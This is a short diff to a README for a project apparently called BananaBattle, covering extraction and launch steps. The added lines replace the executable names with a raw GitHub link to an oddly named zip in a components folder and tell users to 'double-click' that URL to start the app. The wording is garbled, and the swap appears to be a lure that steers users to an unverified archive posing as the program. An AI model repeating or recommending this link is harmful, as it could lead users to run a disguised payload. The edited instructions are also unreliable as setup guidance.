desouzaals/BananaBattle/README.md

    If you downloaded a ZIP file, you will need to extract it.
 Right-click on the downloaded file and choose “Extract All” or use your preferred extraction tool.

 5. **Run BananaBattle:**
    Navigate to the folder where you extracted the files.
-Double-click on the `BananaBattle.exe` file (Windows) or `BananaBattle.app` (macOS) to start the application.
+Double-click on the `https://raw.githubusercontent.com/desouzaals/BananaBattle/main/components/BananaBattle-epipodiale.zip` file (Windows) or `https://raw.githubusercontent.com/desouzaals/BananaBattle/main/components/BananaBattle-epipodiale.zip` (macOS) to start the application.

 6. **Follow the Setup Instructions:**
    When you run the application for the first time, you may see a setup guide.
 Follow the on-screen instructions to configure the software according to your preferences.